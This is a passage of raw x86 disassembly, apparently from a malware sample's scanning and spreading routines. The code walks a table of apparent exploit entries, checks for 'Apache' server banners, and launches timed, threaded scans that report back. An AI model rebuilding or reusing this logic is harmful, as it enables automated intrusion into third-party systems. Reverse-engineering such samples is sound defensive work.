cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
push offset dword_41CE40
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset dword_41CE38
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset dword_41CE30
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41331E proc near ; DATA XREF: sub_41349C+4EB�o
; sub_413CB3+27C�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push [ebp+arg_0]
lea eax, [ebp+var_14C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
push [ebp+var_10E]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push [ebp+var_10E]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: sub_41331E+4E�j
cmp [ebp+var_112], 0
jz short loc_4133B1
push [ebp+var_10E]
call sub_41308F
pop ecx
cmp [ebp+var_112], eax
jz short loc_4133B1
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_41331E+6A�j
; sub_41331E+7E�j
cmp [ebp+var_8A], 1
jnz short loc_4133E0
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_404552
pop ecx
pop ecx
push offset dword_41F018
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: sub_41331E+9A�j
cmp [ebp+var_8A], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp+var_6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: sub_41331E+C9�j
call sub_412D4C
push eax
lea eax, [ebp+var_6]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41F018
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: sub_41331E+C0�j
; sub_41331E+100�j
lea eax, [ebp+var_14C]
push eax
call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_41346F
push [ebp+var_10E]
push [ebp+var_14C]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41331E+13A�j
cmp [ebp+var_8A], 2
jnz short loc_41348A
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: sub_41331E+14F�j
; sub_41331E+158�j
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: sub_41331E+5E�j
; sub_41331E+8E�j
leave
retn 4
sub_41331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41349C proc near ; DATA XREF: sub_413AB0+1F4�o
var_774 = qword ptr -774h
var_764 = qword ptr -764h
var_75C = byte ptr -75Ch
var_65C = byte ptr -65Ch
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
var_64C = byte ptr -64Ch
var_648 = byte ptr -648h
var_644 = dword ptr -644h
var_640 = byte ptr -640h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = byte ptr -624h
var_51C = byte ptr -51Ch
var_50E = dword ptr -50Eh
var_50A = dword ptr -50Ah
var_506 = dword ptr -506h
var_502 = byte ptr -502h
var_37B = byte ptr -37Bh
var_37A = byte ptr -37Ah
var_377 = byte ptr -377h
var_36B = byte ptr -36Bh
var_36A = byte ptr -36Ah
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_341 = byte ptr -341h
var_296 = dword ptr -296h
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push [ebp+arg_0]
lea eax, [ebp+var_628]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_51C]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp+var_358]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_41349C+3C�j
and [ebp+var_62C], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: sub_41349C:loc_4135BA�j
mov eax, [ebp+var_62C]
inc eax
mov [ebp+var_62C], eax
loc_41350B: ; CODE XREF: sub_41349C+60�j
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_640]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_640]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD80
mov [ebp+var_358], eax
push 3Ah
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_354]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_354]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_341]
push eax
call sub_4105FB
pop ecx
and [ebp+var_296], 0
lea eax, [ebp+var_341]
push eax
lea eax, [ebp+var_51C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_41349C+B0�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: sub_41349C+54�j
; sub_41349C+11C�j
lea eax, [ebp+var_624]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: sub_41349C+132�j
mov al, ds:byte_41DF00
mov [ebp+var_20C], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov al, ds:byte_41DF00
mov [ebp+var_108], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: sub_41349C+19C�j
push [ebp+var_506]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413675
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: sub_41349C+1C4�j
cmp [ebp+var_358], 0
jz loc_413782
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp+var_644], eax
cmp [ebp+var_644], 0
jz short loc_4136B6
mov [ebp+var_296], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_41349C+20C�j
mov [ebp+var_296], 3
loc_4136C0: ; CODE XREF: sub_41349C+218�j
movsx eax, [ebp+var_36B]
test eax, eax
jz short loc_4136E5
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov [ebp+var_296], 1
loc_4136E5: ; CODE XREF: sub_41349C+22D�j
; sub_41349C+23D�j
movsx eax, [ebp+var_37B]
test eax, eax
jz short loc_4136FA
mov [ebp+var_296], 2
loc_4136FA: ; CODE XREF: sub_41349C+252�j
movsx eax, [ebp+var_37A]
test eax, eax
jz short loc_41370F
mov [ebp+var_296], 3
loc_41370F: ; CODE XREF: sub_41349C+267�j
cmp [ebp+var_296], 3
jnz short loc_41372B
cmp [ebp+var_644], 0
jz short loc_41372B
mov [ebp+var_296], 2
loc_41372B: ; CODE XREF: sub_41349C+27A�j
; sub_41349C+283�j
cmp [ebp+var_296], 3
jnz short loc_413782
mov al, [ebp+var_36A]
mov [ebp+var_64C], al
mov al, [ebp+var_377]
mov [ebp+var_648], al
mov [ebp+var_36A], 1
and [ebp+var_377], 0
push 0
lea eax, [ebp+var_502]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_64C]
mov [ebp+var_36A], al
mov al, [ebp+var_648]
mov [ebp+var_377], al
loc_413782: ; CODE XREF: sub_41349C+1E0�j
; sub_41349C+1F4�j ...
push offset dword_41E3A8
call sub_409C6C
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset dword_41CF28
mov eax, [ebp+var_628]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E3A8
call sub_409C7A
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
mov eax, [ebp+var_628]
push dword ptr [eax]
push offset dword_41CEF0
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 18h
cmp [ebp+var_358], 0
jnz short loc_413807
push 3E8h
call ds:dword_41709C ; Sleep
loc_413807: ; CODE XREF: sub_41349C+35E�j
and [ebp+var_10C], 0
call sub_416B64 ; clock
mov [ebp+var_35C], eax
and [ebp+var_4], 0
loc_41381D: ; CODE XREF: sub_41349C+3F9�j
; sub_41349C+44B�j ...
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: sub_41349C+38B�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: sub_41349C+3A9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41F018
lea eax, [ebp+var_20C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: sub_41349C+3F7�j
push [ebp+var_8]
push 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_650], eax
cmp [ebp+var_650], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: sub_41349C+42B�j
; sub_41349C+449�j
push [ebp+var_50A]
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: sub_41349C+4BA�j
; sub_41349C:loc_413A30�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_654], eax
cmp [ebp+var_654], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: sub_41349C+483�j
mov eax, [ebp+var_10C]
inc eax
mov [ebp+var_10C], eax
cmp [ebp+var_358], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_658], eax
cmp [ebp+var_658], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: sub_41349C+4B8�j
push 14Ch
lea eax, [ebp+var_358]
push eax
push [ebp+var_658]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_658]
mov ecx, [ebp+var_654]
mov [eax+3Eh], ecx
push [ebp+var_658]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push [ebp+var_658]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: sub_41349C+4F9�j
push [ebp+var_8]
push [ebp+var_654]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: sub_41349C+507�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: sub_41349C+49E�j
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: sub_41349C+525�j
lea eax, [ebp+var_75C]
push eax
push [ebp+var_654]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp+var_36A]
mov [ebp+var_65C], al
and [ebp+var_36A], 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_75C]
push eax
push offset dword_41CEDC
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_65C]
mov [ebp+var_36A], al
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_4]
add eax, 3E8h
mov [ebp+var_4], eax
loc_413A30: ; CODE XREF: sub_41349C:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: sub_41349C+467�j
; sub_41349C+485�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: sub_41349C:loc_413847�j
push [ebp+var_10C]
call sub_416B64 ; clock
sub eax, [ebp+var_35C]
mov dword ptr [ebp+var_764], eax
and dword ptr [ebp+var_764+4], 0
fild [ebp+var_764]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+774h+var_774]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset unk_41CE98
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: sub_41349C+142�j
; sub_41349C+1AC�j ...
pop edi
leave
retn 4
sub_41349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, ds:byte_41CD80[eax]
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CF54
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB3 proc near ; DATA XREF: sub_413FE7+5C�o
var_49C = dword ptr -49Ch
var_498 = byte ptr -498h
var_494 = byte ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_469 = byte ptr -469h
var_3BE = dword ptr -3BEh
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_1AC = byte ptr -1ACh
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_21 = byte ptr -21h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_330]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset unk_41D000
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_334], 0
and [ebp+var_484], 0
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
lea eax, [ebp+var_32C]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
loc_413D21: ; CODE XREF: sub_413CB3:loc_413FA8�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
and [ebp+var_488], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: sub_413CB3+23B�j
; sub_413CB3:loc_413F77�j
mov eax, [ebp+var_488]
inc eax
mov [ebp+var_488], eax
loc_413D44: ; CODE XREF: sub_413CB3+82�j
mov eax, [ebp+var_488]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_47C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CD80
mov [ebp+var_480], eax
lea eax, [ebp+var_47C]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_469]
push eax
call sub_4105FB
pop ecx
cmp [ebp+var_480], 0
jz loc_413E9A
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp+var_490], eax
cmp [ebp+var_490], 0
jz short loc_413DE9
mov [ebp+var_3BE], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: sub_413CB3+128�j
mov [ebp+var_3BE], 3
loc_413DF3: ; CODE XREF: sub_413CB3+134�j
movsx eax, [ebp+var_15]
test eax, eax
jz short loc_413E15
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov [ebp+var_3BE], 1
loc_413E15: ; CODE XREF: sub_413CB3+146�j
; sub_413CB3+156�j
movsx eax, [ebp+var_25]
test eax, eax
jz short loc_413E27
mov [ebp+var_3BE], 2
loc_413E27: ; CODE XREF: sub_413CB3+168�j
movsx eax, [ebp+var_24]
test eax, eax
jz short loc_413E39
mov [ebp+var_3BE], 3
loc_413E39: ; CODE XREF: sub_413CB3+17A�j
cmp [ebp+var_3BE], 3
jnz short loc_413E55
cmp [ebp+var_490], 0
jz short loc_413E55
mov [ebp+var_3BE], 2
loc_413E55: ; CODE XREF: sub_413CB3+18D�j
; sub_413CB3+196�j
cmp [ebp+var_3BE], 3
jnz short loc_413E9A
mov al, [ebp+var_14]
mov [ebp+var_498], al
mov al, [ebp+var_21]
mov [ebp+var_494], al
mov [ebp+var_14], 1
and [ebp+var_21], 0
push 0
lea eax, [ebp+var_1AC]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_498]
mov [ebp+var_14], al
mov al, [ebp+var_494]
mov [ebp+var_21], al
loc_413E9A: ; CODE XREF: sub_413CB3+FC�j
; sub_413CB3+110�j ...
movsx eax, [ebp+var_13]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp+var_469]
push eax
push [ebp+var_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_48C], eax
cmp [ebp+var_48C], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_49C], eax
cmp [ebp+var_49C], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: sub_413CB3+239�j
push 14Ch
lea eax, [ebp+var_480]
push eax
push [ebp+var_49C]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_484]
inc eax
mov [ebp+var_484], eax
mov eax, [ebp+var_49C]
mov ecx, [ebp+var_48C]
mov [eax+3Eh], ecx
push [ebp+var_49C]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push [ebp+var_48C]
call sub_4053B1
pop ecx
push [ebp+var_49C]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: sub_413CB3+28A�j
lea eax, [ebp+var_47C]
push eax
push [ebp+var_8]
push offset dword_41CFD0
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: sub_413CB3+21B�j
; sub_413CB3+2A4�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413CB3+A1�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413F9A
jmp short loc_413FAD
